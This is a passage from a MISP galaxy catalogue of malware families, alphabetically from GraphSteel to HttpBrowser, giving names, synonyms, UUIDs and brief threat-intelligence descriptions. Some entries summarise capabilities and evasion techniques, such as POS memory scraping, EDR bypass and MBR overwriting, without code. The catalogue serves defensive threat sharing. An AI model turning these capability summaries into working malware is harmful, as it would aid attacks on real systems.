UUID 64963521-0181-4220-935a-a6deefa871b2 which can be used as unique global reference for GraphSteel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Grateful POS

POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. Masked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Grateful POS.

Known Synonyms
`FrameworkPOS`
`SCRAPMINT`
`trinity`

Internal MISP references

UUID f82f8d2c-695e-461a-bd4f-a7dc58531063 which can be used as unique global reference for Grateful POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gratem

Internal MISP references

UUID 5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8 which can be used as unique global reference for Gratem in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem - webarchive

Associated metadata

Metadata key	Value
type	[]

Gravity RAT (Windows)

Internal MISP references

UUID 1de27925-f94c-462d-acb6-f75822e05ec4 which can be used as unique global reference for Gravity RAT (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GREASE

Internal MISP references

UUID 4ed079e6-69bd-481b-b873-86ced9ded750 which can be used as unique global reference for GREASE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GreenShaitan

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GreenShaitan.

Known Synonyms
`eoehttp`

Internal MISP references

UUID 9d0ddcb9-b0da-436a-af73-d9307609bd17 which can be used as unique global reference for GreenShaitan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GreenDispenser

Internal MISP references

UUID 88fda711-cd7f-44e3-b92e-65f1c726df98 which can be used as unique global reference for GreenDispenser in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GreetingGhoul

Internal MISP references

UUID b8763a6f-2711-454d-bbde-7408ebe932c1 which can be used as unique global reference for GreetingGhoul in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GreyEnergy

Internal MISP references

UUID 5a683d4f-31a1-423e-a136-d348910ca967 which can be used as unique global reference for GreyEnergy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GRILLMARK

This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system's proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GRILLMARK.

Known Synonyms
`Hellsing Backdoor`

Internal MISP references

UUID 60cc0c72-e903-4dda-967a-9da0e12d4ac5 which can be used as unique global reference for GRILLMARK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GRIMAGENT

GRIMAGENT is a backdoor that can execute arbitrary commands, download files, create and delete scheduled tasks, and execute programs via scheduled tasks or via the ShellExecute API. The malware persists via a randomly named scheduled task and a registry Run key. The backdoor communicates to hard-coded C&C servers via HTTP requests with portions of its network communications encrypted using both asymmetric and symmetric cryptography. GRIMAGENT was used during some Ryuk Ransomware intrusions in 2020.

Internal MISP references

UUID 57460bae-84ad-402d-8949-9103c5917703 which can be used as unique global reference for GRIMAGENT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GrimPlant

This malware was seen during the cyberattacks on Ukrainian state organizations. It is one of two used backdoors written in Go and attributed to UAC-0056 (SaintBear, UNC2589, TA471).

Internal MISP references

UUID 235cba54-256e-48a0-b5dc-5e1aa3247cde which can be used as unique global reference for GrimPlant in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GROK

Internal MISP references

UUID 5ba66415-b482-44ff-8dfa-809329e0e074 which can be used as unique global reference for GROK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GroundPeony

Internal MISP references

UUID 6f52913f-e287-4f7a-95ae-4e43ea29a044 which can be used as unique global reference for GroundPeony in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Growtopia

According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game.

Internal MISP references

UUID 5fb7db86-a510-400c-b7d3-4197eef09755 which can be used as unique global reference for Growtopia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GRUNT

Internal MISP references

UUID 884782cf-9fdc-4f3c-8fba-e878330d0ef5 which can be used as unique global reference for GRUNT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

gsecdump

Internal MISP references

UUID 8410d208-7450-407d-b56c-e5c1ced19632 which can be used as unique global reference for gsecdump in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GSpy

A malware family with a DGA.

Internal MISP references

UUID 4e466824-7081-4163-8d90-895492b55f23 which can be used as unique global reference for GSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GTPDOOR

According to haxrob, GTPDOOR is the name of Linux based malware that is intended to be deployed on systems in telco networks adjacent to the GRX (GRPS eXchange Network) with the novel feature of communicating C2 traffic over GTP-C (GPRS Tunnelling Protocol - Control Plane) signalling messages. This allows the C2 traffic to blend in with normal traffic and to reuse already permitted ports that maybe open and exposed to the GRX network.

Internal MISP references

UUID e06aef59-6133-4e37-9e00-6c05ce52506a which can be used as unique global reference for GTPDOOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GUP Proxy Tool

Internal MISP references

UUID 83d1bf1b-6557-4c2e-aa00-53013be73067 which can be used as unique global reference for GUP Proxy Tool in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gwisin (Windows)

Ransomware.

Internal MISP references

UUID ef39478b-716a-4b98-b10e-36b8ca22060c which can be used as unique global reference for Gwisin (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

H1N1 Loader

Internal MISP references

UUID 0ecf5aca-05ef-47fb-b114-9f4177faace3 which can be used as unique global reference for H1N1 Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HabitsRAT (Windows)

Internal MISP references

UUID b39de9b2-7739-44f4-a03b-1fffa0c0df04 which can be used as unique global reference for HabitsRAT (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HackBrowserData

Browser information stealer, written in Go.

Internal MISP references

UUID a4c2b9c1-ede6-4d55-b27e-5b5d52b9c46c which can be used as unique global reference for HackBrowserData in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hacksfase

Internal MISP references

UUID 2713a763-33fa-45ce-8552-7dd12b6b8ecc which can be used as unique global reference for Hacksfase in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HackSpy

Py2Exe based tool as found on github.

Internal MISP references

UUID 4b5914fd-25e4-4a20-b6f5-faf4b34f49e9 which can be used as unique global reference for HackSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hades

According to PCrisk, Hades Locker is an updated version of WildFire Locker ransomware that infiltrates systems and encrypts a variety of data types using AES encryption. Hades Locker appends the names of encrypted files with the ".~HL[5_random_characters] (first 5 characters of encryption password)" extension.

Internal MISP references

UUID ab9b4a89-c35b-42aa-bffb-98fccf7d318f which can be used as unique global reference for Hades in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hakbit

Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server. The ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.

Contact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent "KiraLock" has kiraransom@ (among others of course).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hakbit.

Known Synonyms
`Thanos Ransomware`

Internal MISP references

UUID 18617856-c6c4-45f8-995f-4916a1b45b05 which can be used as unique global reference for Hakbit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HALFRIG

A stager used by APT29 to deploy CobaltStrike.

Internal MISP references

UUID c89b2d7b-82b7-4329-81d0-ed99be4fad96 which can be used as unique global reference for HALFRIG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hamweq

Internal MISP references

UUID 454fc9f7-b328-451f-806c-68ff5bcd491e which can be used as unique global reference for Hamweq in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hancitor

Hancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hancitor.

Known Synonyms
`Chanitor`

Internal MISP references

UUID 4166ab63-24b0-4448-92ea-21c8deef978d which can be used as unique global reference for Hancitor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Handala

According to Intezer, this is a second stage loader written in Delphi.

Internal MISP references

UUID e65a79ca-9236-4ffa-867c-afe9a856f1d0 which can be used as unique global reference for Handala in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HappyLocker (HiddenTear?)

Internal MISP references

UUID fa0ffc56-6d82-469e-b624-22882f194ce9 which can be used as unique global reference for HappyLocker (HiddenTear?) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker - webarchive

Associated metadata

Metadata key	Value
type	[]

HARDRAIN (Windows)

Internal MISP references

UUID e4948b4c-be46-44a4-81e6-3b1922448083 which can be used as unique global reference for HARDRAIN (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Harnig

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Harnig.

Known Synonyms
`Piptea`

Internal MISP references

UUID 619b9665-dac2-47a8-bf7d-942809439c12 which can be used as unique global reference for Harnig in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Haron Ransomware

Internal MISP references

UUID 788c44c1-d1cd-4b17-8fa9-116d682c3661 which can be used as unique global reference for Haron Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hatef

According to Intezer, this is a wiper.

Internal MISP references

UUID 2af38f0c-b1fb-4241-8ae8-f06ea7729ff1 which can be used as unique global reference for Hatef in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HavanaCrypt

Internal MISP references

UUID d2f11e7f-4daf-42f0-8304-e59935991745 which can be used as unique global reference for HavanaCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Havex RAT

Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as "Dragonfly" and "Energetic Bear". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.

Once installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.

Havex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.

Internal MISP references

UUID c04fc02e-f35a-44b6-a9b0-732bf2fc551a which can be used as unique global reference for Havex RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Havoc

First released in October 2022, the Havoc C2 Framework is a flexible post-exploitation framework written in Golang, C++, and Qt, with agents called 'Demons' written in C and ASM, created by @C5pider. Designed to support red team engagements and adversary emulation, it offers a robust set of capabilities tailored for offensive security operations. The framework, which is under active development, utilizes HTTP(s) and SMB as communication protocols for its implants. Havoc can generate implants, known as Demons, in several formats including EXE, DLL, and Shellcode. A notable feature of Havoc is its ability to bypass EDR by employing advanced evasion techniques such as sleep obfuscation, return address stack spoofing, and indirect syscalls. This capability enhances its effectiveness in evading detection and circumventing security measures.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Havoc.

Known Synonyms
`Havokiz`

Internal MISP references

UUID ddbcedee-ac3e-45d3-be2c-d7315d83e6a6 which can be used as unique global reference for Havoc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HAWKBALL

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Internal MISP references

UUID dc07507b-959f-4521-be0f-b9ff2b32b909 which can be used as unique global reference for HAWKBALL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HawkEye Keylogger

HawKeye is a keylogger that is distributed since 2013. Discovered by IBM X-Force, it is currently spread over phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new "loader capabilities" have been spotted. It is sold by its development team on dark web markets and hacking forums.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HawkEye Keylogger.

Known Synonyms
`HawkEye`
`HawkEye Reborn`
`Predator Pain`

Internal MISP references

UUID 31615066-dbff-4134-b467-d97a337b408b which can be used as unique global reference for HawkEye Keylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HazyLoad

Internal MISP references

UUID a0d0d428-fd1b-460c-a03a-0003c6daff6d which can be used as unique global reference for HazyLoad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HDMR

HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: "!!! READ THIS !!!.hta".

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HDMR.

Known Synonyms
`GO-SPORT`

Internal MISP references

UUID d643273f-7a53-4703-bf65-95716d55a5dd which can be used as unique global reference for HDMR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HDRoot

Internal MISP references

UUID af8df5d7-cd8c-41ea-b9ec-b69ab7811e2d which can be used as unique global reference for HDRoot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HeaderTip

The Chinese threat actor "Scarab" is using a custom backdoor dubbed "HeaderTip" according to SentinelLABS. This malware may be the successor of "Scieron".

Internal MISP references

UUID 994c64f3-ca59-4392-9ab4-0256e79fcfad which can be used as unique global reference for HeaderTip in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Headlace

Internal MISP references

UUID 7229ccd9-1f2b-4a71-8119-1f4eb1c04a5d which can be used as unique global reference for Headlace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Helauto

Internal MISP references

UUID 9af26655-cfba-4e02-bd10-ad1a494e0b5f which can be used as unique global reference for Helauto in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HelloBot (Windows)

Internal MISP references

UUID 64cecfd4-96fd-42a3-8537-fc0e041271a2 which can be used as unique global reference for HelloBot (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HelloKitty (Windows)

Unit42 states that HelloKitty is a ransomware family that first surfaced at the end of 2020, primarily targeting Windows systems. The malware family got its name due to its use of a Mutex with the same name: HelloKittyMutex. The ransomware samples seem to evolve quickly and frequently, with different versions making use of the .crypted or .kitty file extensions for encrypted files. Some newer samples make use of a Golang packer that ensures the final ransomware code is only loaded in memory, most likely to evade detection by security solutions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HelloKitty (Windows).

Known Synonyms
`KittyCrypt`

Internal MISP references

UUID 433c97b5-89ac-4783-a312-8bb890590ff0 which can be used as unique global reference for HelloKitty (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Helminth

Internal MISP references

UUID 19d89300-ff97-4281-ac42-76542e744092 which can be used as unique global reference for Helminth in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Heloag

Internal MISP references

UUID bb07e153-2e51-4ce1-97a3-4ec8a936e625 which can be used as unique global reference for Heloag in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HemiGate

Internal MISP references

UUID 3db00976-d81d-4a54-a639-ae087bc2493d which can be used as unique global reference for HemiGate in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Herbst

Internal MISP references

UUID ca8482d9-657b-49fe-8345-6ed962a9735a which can be used as unique global reference for Herbst in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Heriplor

Internal MISP references

UUID 9d4fc43c-28a1-45ea-ac2c-8d53bdce118b which can be used as unique global reference for Heriplor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hermes

Internal MISP references

UUID 30a230c1-b598-4d06-90ab-3254d6a626d8 which can be used as unique global reference for Hermes in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HermeticWiper

According to SentinelLabs, HermeticWiper is a custom-written application with very few standard functions. It abuses a signed driver called "empntdrv.sys" which is associated with the legitimate Software "EaseUS Partition Master Software" to enumerate the MBR and all partitions of all Physical Drives connected to the victims Windows Device and overwrite the first 512 Bytes of every MBR and Partition it can find, rendering them useless. This malware is associated to the malware attacks against Ukraine during Russians Invasion in February 2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HermeticWiper.

Known Synonyms
`DriveSlayer`
`FoxBlade`
`KillDisk.NCV`
`NEARMISS`

Internal MISP references

UUID db6c1ec5-3961-47ce-9cd1-e650388a15fd which can be used as unique global reference for HermeticWiper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HermeticWizard

Internal MISP references

UUID f4400c49-75c6-494a-aa3e-d873404281c1 which can be used as unique global reference for HermeticWizard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HerpesBot

Internal MISP references

UUID 4734c5a4-e63b-4bb4-8c01-ab0c638a6c21 which can be used as unique global reference for HerpesBot in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes - webarchive

Associated metadata

Metadata key	Value
type	[]

HesperBot

Internal MISP references

UUID 2637315d-d31e-4b64-aa4b-2fc265b0a1a3 which can be used as unique global reference for HesperBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

heyoka

Internal MISP references

UUID 5833d95c-4131-4cd3-8600-fc40bb834fe3 which can be used as unique global reference for heyoka in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HiAsm

Internal MISP references

UUID c49e1f43-a16a-49b1-b23e-9e49cd20c90b which can be used as unique global reference for HiAsm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hidden Bee

Internal MISP references

UUID f1e4862e-75a3-4843-add3-726a6535019c which can be used as unique global reference for Hidden Bee in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HiddenTear

HiddenTear is an open source ransomware developed by a Turkish programmer and later released as proof of concept on GitHub. The malware generates a local symmetric key in order to encrypt a configurable folder (/test was the default one) and it sends it to a centralized C&C server. Due to its small payload it was used as real attack vector over email phishing campaigns. Variants are still used in attacks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HiddenTear.

Known Synonyms
`Cryptear`
`FuckUnicorn`

Internal MISP references

UUID b96be762-56a0-4407-be04-fcba76c1ff29 which can be used as unique global reference for HiddenTear in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HideDRV

Internal MISP references

UUID 84b30881-00bc-4206-8170-51705a8e26b1 which can be used as unique global reference for HideDRV in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HIGHNOON

According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.

Internal MISP references

UUID f04c5821-311f-44c9-9d6c-0fe3fd3a1336 which can be used as unique global reference for HIGHNOON in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HIGHNOON.BIN

Internal MISP references

UUID 0a86eb46-28b5-4797-af63-75f9b2ef9080 which can be used as unique global reference for HIGHNOON.BIN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HIGHNOTE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HIGHNOTE.

Known Synonyms
`ChyNode`

Internal MISP references

UUID d9f03a69-507d-4b1d-af6d-e76fca5952b7 which can be used as unique global reference for HIGHNOTE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HijackLoader

According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelgänging, DLL Search Order Hijacking, and Heaven's Gate. It has been observed to store its malicious payload in the IDAT chunk of PNG file format.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HijackLoader.

Known Synonyms
`DOILoader`
`GHOSTPULSE`
`IDAT Loader`
`SHADOWLADDER`

Internal MISP references

UUID cbba3bc7-9491-402c-af3b-9a15b8bce122 which can be used as unique global reference for HijackLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HiKit

Internal MISP references

UUID 35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1 which can be used as unique global reference for HiKit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HILDACRYPT

A new ransomware family was discovered in August 2019. Called HILDACRYPT, it is named after the Netflix cartoon “Hilda” because the TV show’s YouTube trailer was included in the ransom note of the original version of the malware.

Internal MISP references

UUID fb637fc1-c06b-4b68-b261-0e1c0bd1e17b which can be used as unique global reference for HILDACRYPT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

himan

Internal MISP references

UUID ecad37b9-555a-4029-b181-6f272eed7154 which can be used as unique global reference for himan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Himera Loader

Internal MISP references

UUID b5e83cab-8096-40de-8a5b-5bf0f2e336b2 which can be used as unique global reference for Himera Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hisoka

Internal MISP references

UUID b6734ca0-599f-4992-9094-218d01ddfb3a which can be used as unique global reference for Hisoka in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hive (Windows)

Hive is a strain of ransomware that was first discovered in June 2021. Hive was designed to be used by Ransomware-as-a-service providers, to enable novice cyber-criminals to launch ransomware attacks on healthcare providers, energy providers, charities, and retailers across the globe. In 2022 there was a switch from GoLang to Rust.

Internal MISP references

UUID 4aaa039f-6239-46d8-850d-69e9cbd12e9e which can be used as unique global reference for Hive (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hi-Zor RAT

Internal MISP references

UUID 80987ce7-7eb7-4e55-95f8-5c7a9441acab which can be used as unique global reference for Hi-Zor RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HLUX

Internal MISP references

UUID 8e056957-f28b-4b2f-bf58-6b2f7fdd7d62 which can be used as unique global reference for HLUX in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux - webarchive

Associated metadata

Metadata key	Value
type	[]

Hodur

Internal MISP references

UUID 6dec4a6e-9a33-4f1e-94fc-5e34916b968f which can be used as unique global reference for Hodur in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Holcus Installer (Adware)

Adware, tied to eGobbler and Nephos7 campaigns,

Internal MISP references

UUID 379356c7-ec7a-4880-85d5-afe9608d6b60 which can be used as unique global reference for Holcus Installer (Adware) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HOLERUN

Internal MISP references

UUID 1860127d-41cf-4fe8-a58c-9f5304b91fb1 which can be used as unique global reference for HOLERUN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

homefry

a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.

Internal MISP references

UUID 1fb57e31-b97e-45c3-a922-a49ed6dd966d which can be used as unique global reference for homefry in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HookInjEx

Internal MISP references

UUID b614f291-dbf8-49ed-b110-b69ab6e8c6e5 which can be used as unique global reference for HookInjEx in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HOPLIGHT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HOPLIGHT.

Known Synonyms
`HANGMAN`

Internal MISP references

UUID 3e489132-8687-46b3-b9a7-74ba8fafaddf which can be used as unique global reference for HOPLIGHT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hopscotch

Hopscotch is part of the Regin framework.

Internal MISP references

UUID 0ab4f3ce-5474-4b1e-8ad9-b9ad80e75be8 which can be used as unique global reference for Hopscotch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HorusEyes RAT

Remote Acess Tool Written in VB.NET.

Internal MISP references

UUID cbe47d19-2f74-4dbc-84b5-44c31518c8a7 which can be used as unique global reference for HorusEyes RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Horus Eyes RAT

Warsaw trojan is a new banking trojan based on the Hours Eyes RAT core engine.

Internal MISP references

UUID 5a368326-d594-4a9b-94ff-7e2d41158006 which can be used as unique global reference for Horus Eyes RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HOTCROISSANT

Internal MISP references

UUID 4500694c-d71a-4d11-8f9c-0036156826b6 which can be used as unique global reference for HOTCROISSANT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HOTWAX

HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.

Internal MISP references

UUID d5391c00-9a75-457c-9ef0-0a75c5df8348 which can be used as unique global reference for HOTWAX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Houdini

Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Houdini.

Known Synonyms
`Hworm`
`Jenxcus`
`Kognito`
`Njw0rm`
`WSHRAT`
`dinihou`
`dunihi`

Internal MISP references

UUID 11775f11-03a0-4ba8-932f-c125dfb66e35 which can be used as unique global reference for Houdini in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HtBot

Internal MISP references

UUID 246f62ee-854a-45e9-8c57-34f1fb72762f which can be used as unique global reference for HtBot in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot - webarchive

Associated metadata

Metadata key	Value
type	[]

htpRAT

Internal MISP references

UUID e8d1a1f3-3170-4562-9a18-cadf000e48d0 which can be used as unique global reference for htpRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HTran

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HTran.

Known Synonyms
`HUC Packet Transmit Tool`

Internal MISP references

UUID 3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8 which can be used as unique global reference for HTran in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HttpBrowser

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HttpBrowser.

Known Synonyms
`HttpDump`

Internal MISP references

